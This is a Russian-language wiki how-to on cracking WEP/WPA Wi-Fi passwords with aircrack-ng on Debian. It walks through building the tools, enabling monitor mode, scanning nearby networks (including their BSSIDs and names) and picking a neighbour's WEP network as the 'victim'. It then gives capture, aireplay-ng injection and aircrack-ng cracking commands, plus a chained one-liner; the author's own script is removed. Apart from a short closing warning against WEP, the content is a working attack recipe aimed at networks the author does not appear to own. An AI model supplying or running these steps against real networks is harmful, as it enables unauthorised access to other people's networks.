HowTo - Crack (Wi-Fi) WEP/WPA passwords for under Linux

Материал из KLUG
Перейти к: навигация, поиск

Изобилие и наличие WiFi сегодня, это нормальное явление, и отсутствует только в глухих болотах. :) Ну и то что WiFi ненадежное средство, тоже уже все знают. Складывая 2+2, получается что нужно быть просто ленивым что самому не попробовать, дабы выяснить на сколько он надежен.

<img=http://gsmby.ru/images/stories/icon-wifi.png></img> Пришлось осваивать метод взлома пароля WiFi сети, ради интереса. Естественно глубоко вникать не было времени, на эту тематику написано сто миллионов научных трудов, так что я через гугл быстро нашел программку-жертву, которая поможет осуществить эту задумку. Так что я заинтересовался изучением как защититься, но для этого нужно выяснить как взламывать WiFi (из под Linux), с целью получения пароля, при помощи утилиты aircrack-ng. Забегая наперед скажу - удалось, правда пришлось потратить 4 часа ночью (на изучение) и 4 часа днем(на дебаги и написание удобного скрипта). Так что в процессе этого написал статейку, которую хочу вам и предоставить. Делалось все из под моего любимого Debian, собственно дальше, в статье о том как это я делал, делается акцент только на Debian, и если надумаете повторять, стоит сразу предупредить - могут быть нюансы, которые не описывались, из-за разных установленных пакетов например или идеологий дистрибутивов. Статья на самом деле большая, и в ней делает акцент на то как на практике можно узнать пароль. Надеюсь эта статья, вам поможет понять какие правильные нужно формировать пароли и какое шифрование использовать, что бы быть уверенными что ваши tcp/ip пакеты перемещаются в пространстве по законам ваших желаний о надежности, а не по законам альфа-центавры.

Итак, интернет у меня щас отсутствует, вернее есть wifi без шифрования, но на столько паршивый что пришлось его заюзать терпеливо ради поиска в инете инфы, как ломать беспроводные сети.

Сразу предупреждаю за текст, который будет то на английском то на французском(дефолтовая локаль), однако думаю вас это не вспугнет, и вы и так разберетесь :)

Тут можно скачать уже собранные пакеты или образ загрузочного диска - http://aircrack-ng.org/doku.php?id=slitaz

Удобная штука live-CD - http://download.aircrack-ng.org/slitaz-aircrack-ng-20091124.iso

Скачать aircrack-ng-1.1 - http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz Можно даже скачать собранные пакеты под распространенные дистрибутивы - http://www.aircrack-ng.org/doku.php?id=downloads

И даже под Debian

apt-get install build-essential devscripts dpkg-dev debhelper
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.dsc
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3-2.diff.gz
wget http://ftp.debian.org/debian/pool/main/a/aircrack-ng/aircrack-ng_1.0~rc3.orig.tar.gz
dpkg-source -x aircrack-ng_1.0~rc3-2.dsc
cd aircrack-ng-1.0~rc3
dpkg-buildpackage
dpkg -i ../aircrack-ng*.deb

Но джидаи любят яркие мечи, так что пройдем джидайский путь, шутка. :)

Дальше классика - собрать его

$ tar xfz aircrack-ng-1.0-rc1.tar.gz
$ cd aircrack-ng-1.0-rc1
$ make
$ sudo make install (или из под рута)


но перед этим нужно устанавливаем нужный пакет для удачной сборки aircrack-ng-1.1

xxx@laptop:~$ sudo apt-get install libssl-dev

Теперь осуществляем сборку:

xxx@laptop:~/aircrack/aircrack-ng-1.1$ make
make -C src all
make[1]: entrant dans le répertoire « /home/xxx/aircrack/aircrack-ng-1.1/src »
 <...вырезано...>
make[1]: quittant le répertoire « /home/xxx/aircrack/aircrack-ng-1.1/src »

Инсталлируем, по умолчанию в /usr/local/:

xxx@laptop:~/aircrack/aircrack-ng-1.1$ sudo make install
make -C src install
 <...вырезано...>
make[1]: quittant le répertoire « /home/xxx/aircrack/aircrack-ng-1.1/manpages »
 
[*] Run 'airodump-ng-oui-update' as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).

Обязательно, при наличии интернета, выполнить из под рута команду # airodump-ng-oui-update

laptop:/home/xxx/aircrack/aircrack-ng-1.1# airodump-ng-oui-update
[*] Downloading IEEE OUI file...
[*] Parsing OUI file...
[*] Airodump-ng OUI file successfully updated
laptop:/home/xxx/aircrack/aircrack-ng-1.1#


Так, про-инсталлировали, а теперь самое интересное, кряк WEP/WPA паролей в Wi-Fi сети.

Об этом далее...

xxx@laptop:~/aircrack$ sudo airmon-ng start wlan0
 <...вырезано...>
Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy1]

ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from
http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2

Итак мы видим что просит скачать и установить http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2

Скачиваем iw

xxx@laptop:~/aircrack$ wget -c http://wireless.kernel.org/download/iw/iw-0.9.19.tar.bz2

Расспаковываем iw

xxx@laptop:~/aircrack$ tar xfv ./iw-0.9.19.tar.bz2 

Перед сборкой и установкой, открываем Makefile и правим дефолтный PREFIX

xxx@laptop:~/aircrack/iw-0.9.19$ vi Makefile 
...
PREFIX ?= /usr/local
...

Устанавливаем недостающие пакеты iw

sudo aptitude install libnl2 libnl2-dev libnl-dev libnl1

Собираем iw:

xxx@laptop:~/aircrack/iw-0.9.19$ make

Инсталлируем iw

xxx@laptop:~/aircrack/iw-0.9.19$ sudo make install

А вот теперь важный нюанс, нужно создать на этом этапе директорию для дамп файлов

xxx@laptop:~/aircrack/iw-0.9.19$ cd .. && mkdir dump && cd ./dump

И теперь можно идти далее

xxx@laptop:~/aircrack/dump $ sudo airmon-ng start wlan0
 <...вырезано...>
Interface       Chipset         Driver

wlan0           Atheros         ath5k - [phy1]
                               (monitor mode enabled on mon0)

А для того что бы проверить что появился этот самый mon0 нужно выполнить команду

xxx@laptop:~/aircrack/dump$ sudo ifconfig mon0


Находим в ссписке доступный сетей, так сказать "жертву", при помощи airodump-ng на интерфейсе mon0 sudo airodump-ng mon0

CH  4 ][ Elapsed: 4 s ][ 2011-05-27 14:14                                         
                                                                                                                            
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                              
                                                                                                                            
94:0C:6D:EE:4B:2A  -99        3        0    0   6  54   WPA2 CCMP   PSK  TP-LINK_EE4B2A                                     
02:1F:3C:00:00:A1   -1       27        0    0  11  54 . WEP  WEP         Andrulik                                           
00:22:6B:5E:61:A9  -81       21        3    0  11  54   WEP  WEP         linksysy                                            
48:5B:39:7A:67:33  -88       10        0    0   1  54   WPA2 CCMP   PSK  Lexus                                              
1C:AF:F7:B3:04:74  -89       26        0    0  11  54   WPA2 CCMP   PSK  DLink_home                                         
00:24:01:24:40:C9  -91        9        0    0   2  54 . OPN              Domashka                                           
00:1D:7E:BD:4E:2A  -89       19        1    0  11  54   WPA  CCMP   PSK  anakonda                                           
00:0E:A6:7E:94:7C  -97        2        0    0   1  54   WEP  WEP         THOMSON                                            
00:01:23:45:67:89  -99        4        0    0   3  54 . WPA2 CCMP   PSK  HOME_WIFI                                          
00:21:27:FB:A9:86  -96        2        0    0   6  54 . WPA2 CCMP   PSK  Rodeon                                             
00:90:4C:C1:00:00  -99        2        0    0   4  54e  WPA2 CCMP   PSK  BOS_Wi-Fi                                           
00:0E:A6:7E:95:81  -100        4        0    0   1  54   WEP  WEP         THOMSON                                            
00:22:B0:4B:B3:47  -98        3        0    0   6  54 . WPA2 CCMP   PSK  BOND                                                
00:21:27:E0:34:BC  -99        3        0    0   6  54 . WEP  WEP         VOLIA_175                                           
                                                                                                                             
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                                                    
                                                                                                                            
02:1F:3C:00:00:A1  00:1F:3C:82:4D:12  -82    0 - 1      0       27                                                           
00:22:6B:5E:61:A9  F0:7D:68:64:19:07   -1   36 - 0      0        3


Еще это можно делать из под утилиты монитора, я это и делал изначально при помощи утилиты wicd Сперва ее проинсталируйте, пригодится, отличный монитор и цеплялка к вайфаям:

xxx@laptop:~/aircrack/dump $ sudo aptitude install python-wicd wicd wicd-cli wicd-client wicd-curses wicd-daemon wicd-gtk

Запускаем в X эту утилиту wicd-gtk и находим "жертву" с чудным названием "linksysy", выдираем её MAC, в данном случае 00:22:6B:5E:61:A9

xxx@laptop:~/aircrack/dump $ sudo airodump-ng -c 11 --bssid 00:22:6B:5E:61:A9 -w dump mon0

и начинает сканиться сеть, параллельно укладывая дамп в файлы в этой директории, напомню мы находимся в ~/aircrack/dump

CH 11 ][ Elapsed: 1 min ][ 2011-05-27 03:09 ][ fixed channel mon0: -1                                         
                                                                                                                            
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                          
                                                                                                                            
00:22:6B:5E:61:A9  -75   0      374       17    0  11  54   WEP  WEP         linksysy                                        
                                                                                                                            
BSSID              STATION            PWR   Rate    Lost  Packets  Probes  

И ждем когда к ней начнут реально обращаться

в ~/aircrack/dump лежит куча дампленных файлов

Cracking

xxx@laptop:~/aircrack/dump $ aircrack-ng -b 00:22:6B:5E:61:A9 dump-01.cap


Еще можно это все немного автоматизировать

xxx@laptop:~/aircrack/dump$ BSSID=00:21:27:E0:34:BC && sudo airodump-ng -c 6 --bssid ${BSSID} -w dump mon0 && aircrack-ng -b ${BSSID} ./dump-01.cap5

А потом

xxx@laptop:~/aircrack/dump$ sudo aireplay-ng -1 0 -e ${NAME} -a ${BSSID} -h ${MY_ARP} mon0 


Да, и вот еще какой важный момент, иногда модуль ядра для wifi может выделываться, по этому полезно делать его перезагрузку

xxx@laptop:~/aircrack/dump$ sudo rmmod ath5k && sudo modprobe ath5k

Для себя я написал скрипт, для удобства и автоматизации

< !!!СКРИПТ УДАЛЁН ИЗ СООБРАЖЕНИЙ БЕЗОПАСНОСТИ!!! >

Кто не успел тот опоздал. :)


А теперь какой главный вывод: - для чего все это делалось, не для того что бы переть пароли, а для того что бы показать какой способ шифрования использовать нельзя! Информации по взлому WiFi полно в инете, и кому понадобится, без вашего ведома залезет в вашу сеть и вы об этом возможно и не узнаете. Хотя узнать тоже можно. Вывод: - Не используйте WEP, испоьзуйте более зашищенные способы шифрования, например WPA2!!!

Личные инструменты
Пространства имён
Варианты
Действия
Навигация
Инструменты